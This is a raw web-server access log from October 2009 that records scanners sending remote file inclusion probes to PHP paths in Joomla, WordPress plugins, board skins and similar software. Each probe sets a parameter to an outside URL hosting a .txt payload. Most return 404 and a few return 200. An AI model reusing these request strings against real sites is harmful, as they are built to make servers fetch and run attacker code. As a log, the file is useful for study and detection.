218.27.203.107 - - [16/Oct/2009:09:28:01 -0500] "GET /logs/access_log.1231891200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:10 -0500] "GET /logs/access_log.1233619200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:10 -0500] "GET /logs/access_log.1234742400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:11 -0500] "GET /logs/access_log.1234569600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:11 -0500] "GET /logs/access_log.1233964800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:11 -0500] "GET /logs/access_log.1238889600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:11 -0500] "GET /logs/access_log.1235779200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:11 -0500] "GET /logs/access_log.1233878400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:11 -0500] "GET /logs/access_log.1238544000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:14 -0500] "GET /logs/access_log.1238716800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:14 -0500] "GET /logs/access_log.1230249600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:20 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:21 -0500] "GET /logs/access_log.1235088000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:21 -0500] "GET /logs/access_log.1234051200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:21 -0500] "GET /logs/access_log.1231113600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:21 -0500] "GET /logs/access_log.1230681600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:21 -0500] "GET /logs/access_log.1234828800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:22 -0500] "GET /logs/access_log.1237680000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:22 -0500] "GET /logs/access_log.1232582400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:29 -0500] "GET /logs/access_log.1234396800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:09:28:31 -0500] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:09:28:31 -0500] "GET /logs/access_log.1247097600/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:09:28:31 -0500] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:33 -0500] "GET /logs/access_log.1230940800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:43 -0500] "GET /logs/access_log.1230163200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:45 -0500] "GET /logs/access_log.1249171200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:45 -0500] "GET /logs/access_log.1233532800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:28:47 -0500] "GET /logs/access_log.1237852800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:09:28:54 -0500] "GET /logs/access_log.1243641600/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:29:00 -0500] "GET /logs/access_log.1245110400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:29:00 -0500] "GET /logs/access_log.1232668800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:29:01 -0500] "GET /logs/access_log.1239840000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:29:01 -0500] "GET /logs/access_log.1242259200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:29:01 -0500] "GET /logs/access_log.1235606400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:29:01 -0500] "GET /logs/access_log.1235692800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:29:03 -0500] "GET /logs/access_log.1249257600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:09:29:08 -0500] "GET //skin/zero_vote/admin.php?dir=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:09:29:08 -0500] "GET /logs//skin/zero_vote/admin.php?dir=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:09:29:08 -0500] "GET /logs/access_log.1228608000%20%20//skin/zero_vote/admin.php?dir=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:09:29:09 -0500] "GET //skin/zero_vote/admin.php?dir=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:09:29:09 -0500] "GET /logs//skin/zero_vote/admin.php?dir=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:09:29:09 -0500] "GET /logs/access_log.1228608000%20%20//skin/zero_vote/admin.php?dir=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:29:11 -0500] "GET /logs/access_log.1239753600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:29:12 -0500] "GET /logs/access_log.1248912000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:29:13 -0500] "GET /logs/access_log.1230336000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:29:13 -0500] "GET /logs/access_log.1249430400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:09:29:15 -0500] "GET //skin/zero_vote/admin.php?dir=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:09:29:15 -0500] "GET /logs/access_log.1228608000%20%20//skin/zero_vote/admin.php?dir=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:09:29:15 -0500] "GET /logs//skin/zero_vote/admin.php?dir=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
209.97.212.185 - - [16/Oct/2009:09:29:17 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
209.97.212.185 - - [16/Oct/2009:09:29:17 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
209.97.212.185 - - [16/Oct/2009:09:29:17 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:29:25 -0500] "GET /logs/access_log.1229817600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:29:25 -0500] "GET /logs/access_log.1240617600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:09:29:29 -0500] "GET //skin/zero_vote/admin.php?dir=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:09:29:29 -0500] "GET /logs//skin/zero_vote/admin.php?dir=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:09:29:29 -0500] "GET /logs/access_log.1228608000%20%20//skin/zero_vote/admin.php?dir=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:29:34 -0500] "GET /logs/access_log.1238630400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:29:36 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:29:36 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:29:36 -0500] "GET /logs/access_log.1232928000//include/admin.lib.inc.php?site_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:29:40 -0500] "GET /logs/access_log.1249344000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:29:42 -0500] "GET /logs/access_log.1237075200//include/admin.lib.inc.php?site_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:31:24 -0500] "GET ///al_initialize.php?alpath=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:31:24 -0500] "GET /logs///al_initialize.php?alpath=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:31:24 -0500] "GET /logs/access_log.1250985600///al_initialize.php?alpath=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:31:24 -0500] "GET /logs/access_log.1248566400///al_initialize.php?alpath=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:31:36 -0500] "GET ///al_initialize.php?alpath=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:31:36 -0500] "GET /logs///al_initialize.php?alpath=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:31:36 -0500] "GET /logs/access_log.1248566400///al_initialize.php?alpath=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:31:36 -0500] "GET /logs/access_log.1250985600///al_initialize.php?alpath=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:32:39 -0500] "GET /logs/access_log.1249516800///al_initialize.php?alpath=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:32:39 -0500] "GET /logs/access_log.1250380800///al_initialize.php?alpath=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:09:32:48 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:09:32:48 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:09:32:48 -0500] "GET /logs/access_log.1227052800//bbs//skin/ggambo7002_board/write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:09:32:48 -0500] "GET /logs/access_log.1223424000//bbs//skin/ggambo7002_board/write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:33:03 -0500] "GET /logs/access_log.1250380800///al_initialize.php?alpath=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:33:04 -0500] "GET /logs/access_log.1249516800///al_initialize.php?alpath=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
210.110.97.12 - - [16/Oct/2009:09:34:48 -0500] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
210.110.97.12 - - [16/Oct/2009:09:34:48 -0500] "GET /logs/access_log.1232064000///include/print_category.php?setup[use_category]=1&dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
210.110.97.12 - - [16/Oct/2009:09:34:50 -0500] "GET ///include/print_category.php?setup[use_category]=1&dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
210.110.97.12 - - [16/Oct/2009:09:35:00 -0500] "GET /logs/access_log.1238284800///include/print_category.php?setup[use_category]=1&dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:35:03 -0500] "GET /logs/access_log.1231891200//include/admin.lib.inc.php?site_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:35:03 -0500] "GET /logs/access_log.1234828800//include/admin.lib.inc.php?site_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:35:03 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:35:03 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:35:04 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:35:04 -0500] "GET /logs/access_log.1234828800//include/admin.lib.inc.php?site_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:35:04 -0500] "GET /logs/access_log.1231891200//include/admin.lib.inc.php?site_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:35:04 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
210.127.253.142 - - [16/Oct/2009:09:36:19 -0500] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
210.127.253.142 - - [16/Oct/2009:09:36:19 -0500] "GET ///include/print_category.php?setup[use_category]=1&dir=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
210.127.253.142 - - [16/Oct/2009:09:36:20 -0500] "GET /logs/access_log.1232064000///include/print_category.php?setup[use_category]=1&dir=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
210.127.253.142 - - [16/Oct/2009:09:36:24 -0500] "GET /logs/access_log.1238284800///include/print_category.php?setup[use_category]=1&dir=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
65.55.106.162 - - [16/Oct/2009:09:36:31 -0500] "GET /logs/access_log.1135987200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.193.15.3 - - [16/Oct/2009:09:37:41 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:09:38:17 -0500] "GET /logs/access_log.1251244800//bbs//skin/ggambo7002_board/write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:09:38:17 -0500] "GET /logs/access_log.1250899200//bbs//skin/ggambo7002_board/write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
82.193.15.3 - - [16/Oct/2009:09:38:18 -0500] "GET /logs/access_log.1246320000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:09:38:26 -0500] "GET ////skin/happycast_category_lightblack/login.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:09:38:26 -0500] "GET /logs/access_log.1250899200////skin/happycast_category_lightblack/login.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:09:38:26 -0500] "GET /logs////skin/happycast_category_lightblack/login.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:09:38:26 -0500] "GET /logs/access_log.1251936000////skin/happycast_category_lightblack/login.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:09:38:28 -0500] "GET /logs////skin/happycast_category_lightblack/login.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:09:38:28 -0500] "GET ////skin/happycast_category_lightblack/login.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:09:38:28 -0500] "GET /logs/access_log.1250899200////skin/happycast_category_lightblack/login.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:09:38:28 -0500] "GET /logs/access_log.1251936000////skin/happycast_category_lightblack/login.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:09:38:48 -0500] "GET ////skin/happycast_category_lightblack/login.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:09:38:48 -0500] "GET /logs////skin/happycast_category_lightblack/login.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:09:38:48 -0500] "GET /logs/access_log.1250899200////skin/happycast_category_lightblack/login.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:09:38:48 -0500] "GET /logs/access_log.1251936000////skin/happycast_category_lightblack/login.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
209.97.212.185 - - [16/Oct/2009:09:39:30 -0500] "GET /logs/access_log.1246320000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:41:20 -0500] "GET ///?commonpath=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:41:20 -0500] "GET /logs/access_log.1250640000///?commonpath=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:41:22 -0500] "GET /logs///?commonpath=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 200 209043 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:41:30 -0500] "GET /logs/access_log.1252281600///?commonpath=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:09:42:41 -0500] "GET /home.php?pagina=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:09:42:41 -0500] "GET /logs/home.php?pagina=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:09:42:43 -0500] "GET /logs/access_log.1253145600/home.php?pagina=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:09:42:43 -0500] "GET /home.php?pagina=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:09:42:43 -0500] "GET /logs/access_log.1253145600/home.php?pagina=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:09:42:43 -0500] "GET /logs/home.php?pagina=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:09:42:44 -0500] "GET /logs/access_log.1253145600/home.php?pagina=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
